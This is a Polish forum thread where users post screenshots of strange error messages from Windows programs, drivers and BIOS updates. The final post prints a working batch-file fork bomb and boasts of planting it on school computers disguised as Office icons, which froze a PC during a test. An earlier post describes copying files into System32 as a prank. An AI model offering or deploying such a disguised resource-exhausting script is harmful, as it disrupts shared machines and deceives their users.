3'rd post (dziwne komunikaty programów i syst. operacyjnych)
3'rd post (dziwne komunikaty programów i syst. operacyjnych)
W nawiązaniu do tych dwóch tematów ( temat pierwszy oraz temat drugi ) założyłem ten temat jako temat trzeci. Mianowicie od czasu do czasu się zdarza, że nasz nieomylny komputer się wyłoży i zarówno jego system operacyjny jak również programy generują dziwne komunikaty. Dlatego postanowiłem utworzyć temat zawierający galerię takich komunikatów. W sumie chodzi o to aby kiedy komputer wyświetli nam "inteligentny komunikat" zrobić zrzut ekranu i po odpowiedniej obróbce graficznej (przeskalowanie do mniejszej rozdzielczości lub wycięcie samego komunikatu z zrzutu ekranu) zamieścić ten zrzut ekranu w tym temacie. Najprostszym sposobem wykonania zrzutu ekranu jest naciśnięcie klawisza Print Screen, a potem wklejenie zawartości schowka do programu graficznego np. Gimp'a, a następnie jego przeskalowanie lub przycięcie do odpowiedniej (małej wielkości i rozdzielczości). Są także odpowiednie programy do robienia zrzutów ekranu. Oczywiście są także programy i sposoby na sztuczne generowanie takich komunikatów, informacji, itp. Dlatego warto przy swoim obrazku zaznaczyć czy jest to komunikat pochodzenia naturalnego czy też wygenerowany w sposób sztuczny. Oczywiście bardziej cenne będą komunikaty pochodzenia naturalnego, niż te sztucznie generowane. Dobrze było by zaproponować odpowiedni tytuł dla swojego obrazka. Od pewnego czasu w swojej kolekcji mam trochę takich zrzutów ekranu. Jeśli będzie zainteresowanie tym tematem to zrzuty te będę tu sukcesywnie zamieszczał.
Na dobry początek pierwszy obrazek. Nazwę go "Inteligentny translator". Tłumaczenie translatora powstało w sposób "naturalny" przy próbie przetłumaczenia pewnego zwrotu z języka angielskiego co widać poniżej.
Na dobry początek pierwszy obrazek. Nazwę go "Inteligentny translator". Tłumaczenie translatora powstało w sposób "naturalny" przy próbie przetłumaczenia pewnego zwrotu z języka angielskiego co widać poniżej.
To ja załączę swoje 2 grosze.
Grosz pierwszy - kiedyś miałem drukarkę lexmark'a... Po którejś instalacji sterowników zostałem uraczony takim komunikatem.
Grosz drugi - taki komunikat generował kiedyś, bodajże ALLPlayer - poprawcie mnie jeśli się mylę.
Grosz pierwszy - kiedyś miałem drukarkę lexmark'a... Po którejś instalacji sterowników zostałem uraczony takim komunikatem.
Grosz drugi - taki komunikat generował kiedyś, bodajże ALLPlayer - poprawcie mnie jeśli się mylę.
- Załączniki
-
- cos_tam.gif
- Grosz drugi - poważne podejście do kodeków firmy M$
- (9.79 KiB) Pobrany 7919 razy
-
- Lex.gif
- Grosz pierwszy - zadziwiająca mnogość wykrytych drukarek.
- (15.06 KiB) Pobrany 482 razy
Kolejny obrazek, to zrzut ekranu podczas instalacji oryginalnej wersji programu WinDVD 1.xx. Jest to okno przedstawiające umowę licencyjną użytkownika. Odmienny wygląd tego okna spowodowany jest zainstalowaniem nakładki Window Blinds 3.xx, służącej do zmiany wyglądu okien Windows'a. Jednak bez tej nakładki efekt jest taki sam - krzaczki zamiast tekstu. Prawdopodobnie jest to spowodowane inną stroną kodową tekstu umowy licencyjnej oraz to iż instalator Win DVD został przygotowany w innej wersji językowej, (np. cyrylica, itp.) Po zainstalowaniu Win DVD jego menu było poprawnie wyświetlane po angielsku. Mam wszystkie obrazki z całego etapu instalacji tej wersji Win DVD. Obrazek ten zatytułował bym: "Przeczytaj licencję i wszystko będzie jasne".
Cóż tu dużo pisać przy tym rysunku. Komunikat "naturalny" powstały w WinVista. Najlepszą jego nazwą będzie chyba: "Błąd który zakończył się sukcesem".
gwozdex napisał:
Spotyka się pliki filmowe z rozszerzeniem *.dat. Jeśli w AllPlayerze skojarzymy wszystkie pliki filmowe z tym odtwarzaczem (ma on taką opcję) to wtedy wszystkie pliki z tym rozszerzeniem będą domyślnie otwierane właśnie w AllPlayerze. Nawet jeśli nie będą to pliki z filmami, tylko pochodzące z innych programów, lecz mające rozszerzenie *.dat. Wówczas otrzymamy taki lub podobny komunikat o błędzie. Można wówczas usunąć skojarzenie plików *.dat z AllPlayerem i ustawić je z innym potrzebnym programem. Może się jednak wówczas zdarzyć odwrotna sytuacja, iż filmy będą otwierane w innym programie nieprzeznaczonym do ich odtwarzania i znów będzie jakiś komunikat o błędzie (do zamieszczenia tutaj).Nie wiem dlaczego pliki z rozszerzeniem *.DAT były interpretowane jako pliki programu AllPlayer. Przy próbie jego otwarcia naturalnie pojawiał się komunikat o którym mowa (drugi grosz).
- Załączniki
-
- Błąd który zakończył się sukcesem.
- Humor_xxx2.jpg (17.06 KiB) Przejrzano 12760 razy
Jak wruciłem przypadkowy ".DAT" do AllPlayera, to mi wywaliło coś takiego:
(inny wygląd okna - inna kompozycja windowsa)
(inny wygląd okna - inna kompozycja windowsa)
- Załączniki
-
- allplayer.gif
- (10.88 KiB) Pobrany 7853 razy
Ten efekt powstał w sposób sztuczny. Nazwę go "Stereofoniczny Panel sterowania". Mianowicie ikonki widoczne w Panelu sterowania mają rozszerzenie *.cpl. Wystarczyło więc za pomocą wyszukiwania plików MS Windows znaleźć wszystkie pliki z tym rozszerzeniem. Potem skopiowałem je w inną lokalizację i za pomocą narzędzia do masowej zmiany nazw plików (wbudowanym w Total Commander) plikom tym zmieniłem nazwy na coś w stylu _00.cpl, _01.cpl, itd., po to aby łatwiej można je było potem znaleźć i usunąć. Poza tym dwa identyczne pliki nie mogą być obok siebie w tym samym katalogu, stąd taka łatwa do odnalezienia nazwa. Potem pliki te skopiowałem do katalogu C:\Windows\System32\ (ich pierwotna lokalizacja). Efekt można zobaczyć poniżej. Praktycznie każda ikonka jest zdublowana, jedynie kilka z nich się oparło temu zabiegowi. Pliki można powielić tak, aby było więcej kopii tej samej ikonki. Dobry pomysł na Prima Aprilis - powinno zaskoczyć każdego.

Ostatnio zmieniony 29 sty 2008, 23:22 przez KrzysiekK, łącznie zmieniany 1 raz.
Nie wiem czy sprawdzimy tą szybę. U mnie przy dekompresji otrzymuję pytanie o hasło do archiwum.
Póki co dwa optymistyczne rysunki ukazujące komunikaty powstałe podczas aktualizacji BIOSu płyty głównej. Co najciekawsze płyta po tej aktualizacji działa.
Póki co dwa optymistyczne rysunki ukazujące komunikaty powstałe podczas aktualizacji BIOSu płyty głównej. Co najciekawsze płyta po tej aktualizacji działa.
- Załączniki
-
- Optymistyczny komunikat przy aktualizacji BIOSu - 1.
- Humor19.jpg (9.23 KiB) Przejrzano 12713 razy
Ostatnio zmieniony 04 sty 2008, 21:32 przez KrzysiekK, łącznie zmieniany 1 raz.
http://pl.youtube.com/watch?v=qwDshsILR1k - wideo mej własnej roboty
Spróbuj ładować plik tekstowy w Ivonie 1.0, rozmyśl się i... co?! No error occured! BUHAHAHA!!
PS: Mój nick na youtubie to RicoElectrico, ale nick Brzozza93 nie mógł potwierdzić maila - wtedy nie można uploadować.
Mam coś jeszcze na extra kompowe kawały w szkole!!
Zapisz jako plik z rozszerzeniem BAT. Jest to tzw. fork bomba - skrypt odpala sam siebie - daje to duuużookienek DOS-u. Strasznie trudno jest to wyłączyć. Podłożyłem to na kompie w szkole na pulpit jako Excel, Word i Powerpoint. parę później facetka wściekła i kazała mi to skasować gdyż ktoś miał pisać sprawdzian i nagle zawiecha
(Sama usunąć nie potrafi??
)
Spróbuj ładować plik tekstowy w Ivonie 1.0, rozmyśl się i... co?! No error occured! BUHAHAHA!!
PS: Mój nick na youtubie to RicoElectrico, ale nick Brzozza93 nie mógł potwierdzić maila - wtedy nie można uploadować.
Mam coś jeszcze na extra kompowe kawały w szkole!!
Zapisz
Kod: Zaznacz cały
@echo off
:s
start %0
goto s